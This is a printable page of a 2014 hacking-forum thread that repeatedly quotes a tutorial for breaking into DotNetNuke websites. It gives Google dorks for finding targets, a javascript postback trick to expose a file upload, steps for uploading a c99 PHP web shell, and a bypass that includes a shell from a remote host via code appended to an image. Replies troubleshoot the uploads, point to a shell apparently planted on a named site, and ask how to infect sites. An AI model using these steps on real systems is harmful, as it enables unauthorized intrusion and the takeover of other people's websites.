Sinisterly
Hacking Into Websites In Only Two Minutes Via The DNN Method - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: Hacking Into Websites In Only Two Minutes Via The DNN Method (/Thread-Hacking-Into-Websites-In-Only-Two-Minutes-Via-The-DNN-Method)

Pages: 1 2 3 4 5


RE: Hacking Into Websites In Only Two Minutes Via The DNN Method - BlueCat - 06-16-2014

(06-16-2014, 07:21 AM)Wild Hacker Wrote:
(06-16-2014, 01:33 AM)BlueCat Wrote:
(06-15-2014, 12:07 PM)Wild Hacker Wrote: I need help in shell uploadin this this method im unable to do that help me please

Make sure you're uploading it as a .txt file. And not .PHP also what type of shell is it? Overall a c99 shell is the best

see i uploded c99 in txt format its not working :Slant: :Confused:
:Embarrassed:

http://www.iiit.org/portals/0/c99.php.txt

Sorry, I have not done much of shell uploading. Only studied it. I believe uploading a shell is like the following. C99.php;.jpg. To be able to execute that you would also need to save the c99 shell as C99.asp;.jpg before you upload it


RE: Hacking Into Websites In Only Two Minutes Via The DNN Method - Hatemind - 06-16-2014

(06-16-2014, 12:55 PM)BlueCat Wrote:
(06-16-2014, 07:21 AM)Wild Hacker Wrote:
(06-16-2014, 01:33 AM)BlueCat Wrote:
(06-15-2014, 12:07 PM)Wild Hacker Wrote: I need help in shell uploadin this this method im unable to do that help me please

Make sure you're uploading it as a .txt file. And not .PHP also what type of shell is it? Overall a c99 shell is the best

see i uploded c99 in txt format its not working :Slant: :Confused:
:Embarrassed:

http://www.iiit.org/portals/0/c99.php.txt

Sorry, I have not done much of shell uploading. Only studied it. I believe uploading a shell is like the following. C99.php;.jpg. To be able to execute that you would also need to save the c99 shell as C99.asp;.jpg before you upload it

You can't save a php shell as asp and expect it to work, unless php is installed on the server and it will execute without it being in a php file, which I doubt it will. You need an asp shell.

Also, c99 is backdoored...


RE: Hacking Into Websites In Only Two Minutes Via The DNN Method - BlueCat - 06-16-2014

(06-16-2014, 01:06 PM)Hatemind Wrote:
(06-16-2014, 12:55 PM)BlueCat Wrote:
(06-16-2014, 07:21 AM)Wild Hacker Wrote:
(06-16-2014, 01:33 AM)BlueCat Wrote:
(06-15-2014, 12:07 PM)Wild Hacker Wrote: I need help in shell uploadin this this method im unable to do that help me please

Make sure you're uploading it as a .txt file. And not .PHP also what type of shell is it? Overall a c99 shell is the best

see i uploded c99 in txt format its not working :Slant: :Confused:
:Embarrassed:

http://www.iiit.org/portals/0/c99.php.txt

Sorry, I have not done much of shell uploading. Only studied it. I believe uploading a shell is like the following. C99.php;.jpg. To be able to execute that you would also need to save the c99 shell as C99.asp;.jpg before you upload it

You can't save a php shell as asp and expect it to work, unless php is installed on the server and it will execute without it being in a php file, which I doubt it will. You need an asp shell.

Also, c99 is backdoored...


Php is installed on most servers


RE: Hacking Into Websites In Only Two Minutes Via The DNN Method - Hatemind - 06-16-2014

(06-16-2014, 01:14 PM)BlueCat Wrote:
(06-16-2014, 01:06 PM)Hatemind Wrote:
(06-16-2014, 12:55 PM)BlueCat Wrote:
(06-16-2014, 07:21 AM)Wild Hacker Wrote:
(06-16-2014, 01:33 AM)BlueCat Wrote: Make sure you're uploading it as a .txt file. And not .PHP also what type of shell is it? Overall a c99 shell is the best

see i uploded c99 in txt format its not working :Slant: :Confused:
:Embarrassed:

http://www.iiit.org/portals/0/c99.php.txt

Sorry, I have not done much of shell uploading. Only studied it. I believe uploading a shell is like the following. C99.php;.jpg. To be able to execute that you would also need to save the c99 shell as C99.asp;.jpg before you upload it

You can't save a php shell as asp and expect it to work, unless php is installed on the server and it will execute without it being in a php file, which I doubt it will. You need an asp shell.

Also, c99 is backdoored...


Php is installed on most servers

That may not be the case if the server has asp, I'd use it just to be safe. That's just my opinion, though. It won't hurt to attempt a php shell first; worst case is you get the source code of the shell as the output.


RE: Hacking Into Websites In Only Two Minutes Via The DNN Method - Coscalle - 07-19-2014

i gave your post a golden star in my browser,
awsome information bro Smile


RE: Hacking Into Websites In Only Two Minutes Via The DNN Method - Geryalb - 07-19-2014

can't understand. Pls shed more light!


RE: Hacking Into Websites In Only Two Minutes Via The DNN Method - Vip3r - 08-23-2014

If i were to infect a site whose vulnerability is still unidentified, then can anyone please suggest me any procedure that I could follow to get it done efficiently?


RE: Hacking Into Websites In Only Two Minutes Via The DNN Method - Vip3r - 08-23-2014

If i were to infect a site whose vulnerability is still unidentified, then can anyone please suggest me any procedure that I could follow to get it done efficiently?


RE: Hacking Into Websites In Only Two Minutes Via The DNN Method - tevan - 08-24-2014

(01-28-2014, 01:59 AM)ImminentSilence Wrote: The DNN method is a very simple way to hack into websites, unlike SQL injection or XSS (Cross-site scripting) it does not require script or command injection.

To implement this method you will need:

Access to the internet
Clipboard
Python
Notepad
A jpg image
A PHP shell in .txt format

That is it Smile

Google Dorks required:

inurl:/tabid/36/language/en-US/Default.aspx
inurl:fcklinkgallery.aspx
inurl:/portals/0

Step One: Use the Google dorks, go to a search result an delete everything in the URL till it looks like http://example.com and then after it paste in Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx so the link looks like http://example.com/Providers/HtmlEditorP...llery.aspx and if you get to a Link Gallery that has three options, URL, page and file you can hack in. If it is a blank Link Gallery that only says 'use selected URL' it is not hackable.

Step Two: Go to file, select it and wait for the file page to load.

Step Three: Delete the url and enter:

j a v a s c r i p t:__doPostBack(‘ctlURL$cmdUpload’,”)

Without the spaces.

This javascript will make a browse button visible.

Step Four: Click on the browse button, download c99 shell or another PHP shell and upload it. Sometimes uploads of .php files will be blocked.

Step Five: Getting around block

Bypassing .php upload blocks:

Upload your PHP shell to a web host and then make a .php file containing this code:

<?php
include ("http://linktophpshell.com/shell.php");
?>

Then make a full white .gif or .jpg image and make sure the gif/jpg and php file are all in the same directory.

Then make a python script with this coding:

file = open ('nameofgif.gif','rb').read()
file += open ('nameofphpfile.php','rb').read()
open ('newphpfile.php','wb').write(file)

Then run both. It will create a valid .jpg image containing code to execute the php shell. Upload it to the server, scroll to where the .gif/.jpg you uploaded is located on the website and then the php shell control panel will open letting you do whatever you want.

Easy and awesome post. I am going to try it.


RE: Hacking Into Websites In Only Two Minutes Via The DNN Method - tevan - 08-24-2014

(01-28-2014, 01:59 AM)ImminentSilence Wrote: The DNN method is a very simple way to hack into websites, unlike SQL injection or XSS (Cross-site scripting) it does not require script or command injection.

To implement this method you will need:

Access to the internet
Clipboard
Python
Notepad
A jpg image
A PHP shell in .txt format

That is it Smile

Google Dorks required:

inurl:/tabid/36/language/en-US/Default.aspx
inurl:fcklinkgallery.aspx
inurl:/portals/0

Step One: Use the Google dorks, go to a search result an delete everything in the URL till it looks like http://example.com and then after it paste in Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx so the link looks like http://example.com/Providers/HtmlEditorP...llery.aspx and if you get to a Link Gallery that has three options, URL, page and file you can hack in. If it is a blank Link Gallery that only says 'use selected URL' it is not hackable.

Step Two: Go to file, select it and wait for the file page to load.

Step Three: Delete the url and enter:

j a v a s c r i p t:__doPostBack(‘ctlURL$cmdUpload’,”)

Without the spaces.

This javascript will make a browse button visible.

Step Four: Click on the browse button, download c99 shell or another PHP shell and upload it. Sometimes uploads of .php files will be blocked.

Step Five: Getting around block

Bypassing .php upload blocks:

Upload your PHP shell to a web host and then make a .php file containing this code:

<?php
include ("http://linktophpshell.com/shell.php");
?>

Then make a full white .gif or .jpg image and make sure the gif/jpg and php file are all in the same directory.

Then make a python script with this coding:

file = open ('nameofgif.gif','rb').read()
file += open ('nameofphpfile.php','rb').read()
open ('newphpfile.php','wb').write(file)

Then run both. It will create a valid .jpg image containing code to execute the php shell. Upload it to the server, scroll to where the .gif/.jpg you uploaded is located on the website and then the php shell control panel will open letting you do whatever you want.

Easy and awesome post. I am going to try it.